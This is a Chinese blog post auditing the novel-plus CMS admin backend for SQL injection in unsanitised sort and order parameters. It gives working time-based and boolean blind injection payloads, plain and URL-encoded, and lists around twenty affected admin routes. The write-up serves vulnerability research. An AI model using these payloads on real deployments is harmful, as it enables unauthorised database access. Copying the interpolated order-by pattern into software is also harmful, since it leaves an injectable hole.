novel-plus后台sql注入

最新推荐文章于 2024-09-29 21:50:07 发布
最新推荐文章于 2024-09-29 21:50:07 发布
阅读量381 收藏 4
点赞数 4
文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54030686/article/details/137743863
版权

novel-plus后台sql注入
shiro框架
Shiro 1.2.4及之前的版本中,AES加密的密钥默认硬编码在代码里(SHIRO-550),Shiro 1.2.4以上版本官方移除了代码中的默认密钥,而且配置中也没有设置密钥,无法利用
登录后台
没找到默认账号密码,debug生成一个admin/123456
数据库中sys_usr修改密码为

d0af8fa1272ef5a152d9e27763eea293

提示:类型路由都是一样的,都是在list方法,由于是后台注入
使用者只需要进入数据库中,将用户名密码修改复杂一些,无法爆破出来即可

查找注入 在mybatis配置文件中查找$符号,在DictMapper.xml找到了该符号
在这里插入图片描述
进入Dictdao.java 在这里插入图片描述
查找声明
DictServiceImpl.java
在这里插入图片描述
继续查找

在这里插入图片描述
在DictController中,路由是/common/dict/list,拼接访问
在这里插入图片描述

burpsuite数据包为

这里传入的是limit的两个参数,而limit位置使用了预编译写法,这里传入的应该是order by的两个参数,即sort,order,但是由于sort参数写法
在这里插入图片描述
最后的数据库查询类似于

select *form database where sort='poc' order by poc limit 0,10

所以最后的poc为

1 AND (SELECT if((substr((select user()),1,1)="r"),sleep(0.2),0))

url编码

%31%20%41%4e%44%20%28%53%45%4c%45%43%54%20%69%66%28%28%73%75%62%73%74%72%28%28%73%65%6c%65%63%74%20%75%73%65%72%28%29%29%2c%31%2c%31%29%3d%22%72%22%29%2c%73%6c%65%65%70%28%30%2e%32%29%2c%30%29%29

发送
在这里插入图片描述
由于这里是4条数据,所以延时0.8秒 这里显示830毫秒也是一样的

如果是order参数

and if((substr((select user()),1,1)='r'),sleep(0.5),0)

url编码

%61%6e%64%20%69%66%28%28%73%75%62%73%74%72%28%28%73%65%6c%65%63%74%20%75%73%65%72%28%29%29%2c%31%2c%31%29%3d%27%72%27%29%2c%73%6c%65%65%70%28%30%2e%35%29%2c%30%29%20

在这里插入图片描述
两条数据延时1秒,
最后执行的语句为

select  *  from sys_dict   WHERE  sort = 'id'   order by id and if((substr((select user()),1,1)='r'),sleep(0.5),0)  limit 0, 10
//修改过,查询的参数比较多,想要的只是order by后面的内容

继续查找$符号
在这里插入图片描述
在FileMapper.xml中也有一个order by参数,进入FileDao,查找声明
在FileServiceImpl,继续查找,在FileController中
在这里插入图片描述
路径 /common/sysFile
一样的参数,一样的poc

limit=12&offset=0&sort=id&order=and if((substr((select user()),1,1)='r'),sleep(0.5),0)

当然了

limit=12&offset=0&sort=&order=id and if((substr((select user()),1,1)='r'),sleep(0.5),0) 

limit=12&offset=0&sort=id and if((substr((select user()),1,1)='r'),sleep(0.5),0) &order=

也是可以的,适当修改sleep()数值,避免延时太长

继续查找,只给出poc和导向

GenColumnsMapper.xml——》GenColumnsDao——》GeneratorServiceImpl.listColumnsByTableName——》GeneratorController.genColumnsList

但是GeneratorController.genColumnsList接受的只是tableName,sort和order参数无法控制
在这里插入图片描述而

而tableName参数是预编译写法,无法利用

LogMapper.xml
list——》LogDao.list——》LogServiceImpl.queryList——》LogController.list
路由

/common/log/list

poc

sort=&order=if((substr((select user()),1,1)='r'),username,id)
sort=&order=%61%6e%64%20%69%66%28%28%73%75%62%73%74%72%28%28%73%65%6c%65%63%74%20%75%73%65%72%28%29%29%2c%31%2c%31%29%3d%27%72%27%29%2c%73%6c%65%65%70%28%30%2e%35%29%2c%30%29%20
//都写在一个参数里面也可以

这里数据比较多,延时注入太久,使用布尔注入,通过数据的排列方式不同进行判断
在这里插入图片描述

if((substr((select user()),1,1)='a'),username,id)
%69%66%28%28%73%75%62%73%74%72%28%28%73%65%6c%65%63%74%20%75%73%65%72%28%29%29%2c%31%2c%31%29%3d%27%61%27%29%2c%75%73%65%72%6e%61%6d%65%2c%69%64%29

在这里插入图片描述

AuthorMapper.xml——》AuthorDao——》AuthorServiceImpl——》AuthorController

路由

/novel/author/list

poc

sort=%69%64%20%61%6e%64%20%69%66%28%28%73%75%62%73%74%72%28%28%73%65%6c%65%63%74%20%75%73%65%72%28%29%29%2c%31%2c%31%29%3d%27%72%27%29%2c%73%6c%65%65%70%28%31%29%2c%30%29&order=
sort=id and if((substr((select user()),1,1)='r'),sleep(1),0)&order=

或者

sort=id&order=%20%61%6e%64%20%69%66%28%28%73%75%62%73%74%72%28%28%73%65%6c%65%63%74%20%75%73%65%72%28%29%29%2c%31%2c%31%29%3d%27%72%27%29%2c%73%6c%65%65%70%28%31%29%2c%30%29
sort=id&order= and if((substr((select user()),1,1)='r'),sleep(1),0)

前提这里的sort不能为空

接下来就不详细写了
直写链路和路由,poc都是一样的,而且都是在list位置

BookCommentMapper——》BookCommentDao——》BookCommentServiceImpl——》BookCommentController
/novel/bookComment

BookContentMapper.xml——》BookContentDao——》BookContentServiceImpl——》BookContentController
/novel/bookContent

BookIndexMapper.xml——》BookIndexDao——》BookIndexServiceImpl——》BookIndexController
/novel/bookIndex

BookMapper.xml——》BookDao——》BookServiceImpl——》BookController——》
/novel/book

BookSettingMapper.xml——》BookSettingDao——》BookSettingServiceImpl——》BookSettingController
/novel/bookSetting

CategoryMapper.xml——》CategoryDao——》CategoryServiceImpl——》CategoryController
/novel/category

FriendLinkMapper.xml——》FriendLinkDao——》FriendLinkServiceImpl——》FriendLinkController
/novel/friendLink

NewsMapper.xml——》NewsDao——》NewsServiceImpl——》NewsController
/novel/news

PayMapper.xml——》PayDao——》PayServiceImpl——》PayController
/novel/pay

UserFeedbackMapper.xml——》UserFeedbackDao——》UserFeedbackServiceImpl——》UserFeedbackController
/novel/userFeedback

UserMapper.xml——》UserDao——》UserServiceImpl——》UserController
/novel/user

WebsiteInfoMapper这个没有,控制器没有list方法,dao层中虽然有,但是没方法调用

DataPermMapper.xml——》DataPermDao——》SDataPermerviceImpl——》DataPermController
/system/dataPerm

DeptMapper这个没有,参数内容不可控

MenuMapper.xml——》MenuDao——》MenuServiceImpl——》MenuController
/system/menu

RoleDataPermMapper.xml——》RoleDataPermDao——》RoleDataPermServiceImpl——》RoleDataPermController
/system/roleDataPerm

RoleDataPermMapper这个没有参数内容不可空或者要求Long类型
RoleMapper这个没有,没有方法调用dao层下面的list方法

UserMapper.xml——》UserDao——》UserServiceImpl——》UserController
/sys/user

UserRole这个没有,没有方法调用

天下是个小趴菜
关注
小说精品屋-plus-install-2.1.2 安装教程 - 基于宝塔面板
zjl1353911的博客
05-29 3232
一.简介 小说精品屋-plus 是的增强版本,在小说精品屋的基础上,重新进行了数据库设计、代码重构和功能增强,提升了程序整体的可读性和性能,增加了很多商用特性,致力于打造一个完整的商用小说门户平台。 二.技术栈 Linux,Tomcat,Mysql,宝塔面板,Nginx 三.硬件基础 一台云服务器,或者云虚拟机,或者一台自己的Linux机器 四.安装教程 1.服务器环境搭建 Linux系统安装宝塔面板,在面板内选装Mysql 5.5+,Nginx 1.16+,Tomcat8+ 2.安装包下载 下载小说精品
小说精品屋-plus 安装教程
x201206030的博客
05-06 5035
1. 小说精品屋介绍 小说精品屋是一个多平台(web、安卓app、微信小程序)、功能完善的响应式小说弹幕网站,包含精品小说专区、轻小说专区和漫画专区。包括小说/漫画分类、小说/漫画搜索、小说/漫画排行、完本小说/漫画、小说/漫画评分、小说/漫画在线阅读、小说/漫画书架、小说/漫画阅读记录、小说下载、小说弹幕、小说/漫画自动采集/更新/纠错、小说内容自动分享到微博、邮件自动推广、链接自动推送到百度...
novel-plus 是一个多端(PC、WAP)阅读 、功能完善的小说 CMS 系统
06-15
novel-plus 是一个多端(PC、WAP)阅读 、功能完善的小说 CMS 系统。包括小说推荐、小说检索、小说排行、小说阅读、小说书架、小说评论、小说爬虫、会员中心、作家专区等功能,支持自定义多模版、可拓展的多种小说内容存储方式(内置数据库分表存储和 TXT 文本存储)、阅读主题切换、多爬虫源自动采集和更新小说数据、会员充值、订阅模式、新闻发布和实时统计报表。
探索未来阅读体验:深度解析《novel-plus》项目
gitblog_00013的博客
03-22 403
探索未来阅读体验:深度解析《novel-plus》项目 项目地址:https://gitcode.com/201206030/novel-plus 项目简介 在阅读的世界里,novel-plus 是一个致力于提升电子书阅读体验的开源项目。它集成了丰富的功能和高度定制性,旨在为开发者和读者提供一个更智能、更个性化的阅读平台。 技术分析 前端框架 novel-plus 使用了现代前端框架 Vue.js...
一个多端阅读、功能完善的原创小说 CMS 系统,支持 PC 和 WAP 多端阅读平台、自动化爬虫、定制化模板、作家管理(附源码)
m0_68103752的博客
08-27 1001
该系统支持自定义多模版、多种小说内容存储方式(内置数据库分表存储和 TXT 文本存储)、阅读主题切换、多爬虫源自动采集和更新小说数据、会员充值、订阅模式、新闻发布和实时统计报表等功能。
novel-plus代码审计 爬虫和前台部分
qq_54030686的博客
04-13 948
丢到jwt.io里面分析,实际上存在了四个参数id和username,created,secret,其中created时间戳,secret都可以获取到,但是username和id参数则无法获取,id参数本身就是通过用户名密码在数据库中查询进而获取到的,外部无法获取到,虽然修改之后可以达到切换用户的目的,但实际上,一方面获取构造jwt数据难度,另外一方面用户权限都一致,切换成其他用户也没啥作用。mybatis 可能存在sql注入,主要是$(写法和like,in位置。jjwt jwt认证,可能出现未授权访问。
novel-plus-推荐系统资源
07-01
novel-plus PCWAP CMS TXT
novel-plus.zip
08-18
"novel-plus.zip" 是一个压缩包文件,其名称暗示可能包含一个与小说或阅读相关的项目。"novel-plus" 可能是一个开源项目,旨在创建一个增强型的小说阅读平台,或者是一个软件应用,提供了比传统电子阅读器更多的功能...
uncle-novel-main.zip
06-04
标题“uncle-novel-main.zip”表明这可能是一个包含电子书或小说的压缩文件,而“uncle-novel-main”可能是小说的主目录或者作品名。由于没有提供具体的标签,我们只能根据文件名来推测其内容。从描述中并未获取到...
7 orm 有批量更新_小说精品屋 plus v3.1.0 发布,多项更新和Bug修复
weixin_34208400的博客
01-04 199
小说精品屋-plus v3.1.0发布了,主要改进包括:更新1.爬虫优化,兼容更多源站。2.后台接口Restful Api改造。3.小说章节列表接口排序字段新增默认值。4.novel-admin加入父工程管理。5.Gitee仓库地址更新。6. 新增接口文档示例。Bug修复1.修复手机端导航栏书架的点击问题。2.修复后台管理首页因为数据库大小写敏感导致的报错。演示地址ht...
手痒想写项目?我挑了 10 个开源项目送你
damimi00的博客
07-08 224
我刚学完 Python 语法那会儿,手痒想写个项目展示自己的学习成果。但却不知道写个啥,经过几次失败的尝试和碰壁后认清了现实,发现到自己只是刚学会基本语法,想要从零写个项目还差得远。不知道有多少朋友和我一样,手痒想写个项目。但: 不知道能写什么 知道写什么,但无从下手 如果刚学完语法想写个项目,可以先从 Web 方向入手。因为这方面有很多现成的框架和资料,但不要上来就去学习框架(看文档)不然你“手痒”的冲动和仅有的那点激情,可能就全部消耗在了啃框架上。我建议你去找一个 感兴趣的 Web 开源项目,然后..
很哇塞的 3 个 Java 实战项目!
<sdffdsfsdfdfs>sfsfsfsdfsdffds</sdfsDS>Fsd
04-06 512
????????关注后回复“进群”,拉你进程序员交流群????????作者丨Guide哥来源丨JavaGuide(ID:JavaGuide)日常学习编程的过程中,项目实战是不可避免的!...
Linux云计算 |【第四阶段】NOSQL-DAY2
小安的运维专栏
09-26 1151
Redis集群概述、部署Redis集群(配置manage管理集群主机、创建集群、访问集群、添加节点、移除节点)
PostgreSQL的表碎片
最新发布
文牧之的博客
09-29 477
表碎片化是指表数据在文件系统中的不连续存储,导致读取和写入操作的效率降低。频繁的插入和删除:导致数据块中出现“空洞”。更新操作:由于 PostgreSQL 的 MVCC(多版本并发控制)机制,更新操作会生成新的行版本,原来的空间会被标记为可重用但是不立即回收。
实用SQL小总结
UntifA的博客
09-29 1207
SQL记录
PostgreSQL 17新特性merge语法增强
zxrhhm的博客
09-27 588
merge语法增强,支持 RETURNING 子句,可以返回新增、更新或者删除的数据行
novel-naifu-aki.zip/
09-19
novel-naifu-aki.zip文件是一个压缩文件,其中包含了一本小说的内容。这个文件的后缀名.zip表示它是一个经过压缩的文件,通常用于减小文件大小和方便传输。 根据文件名可以推断,这本小说可能是由作者Naifu Aki所写。但具体关于小说的内容、类型或其他信息,我无法在这个回答中得知。如果你有兴趣了解这本小说的更多信息,你可以下载并解压该压缩文件,查看其中的内容。 要解压一个.zip文件,你可以使用各种文件压缩软件或操作系统自带的解压工具。解压后,你可能会得到一个包含小说内容的文件或者一个包含多个文件的文件夹。你可以打开这个文件或文件夹,阅读小说,并了解它的故事情节和人物角色。 希望这个回答能帮助到你,如果还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值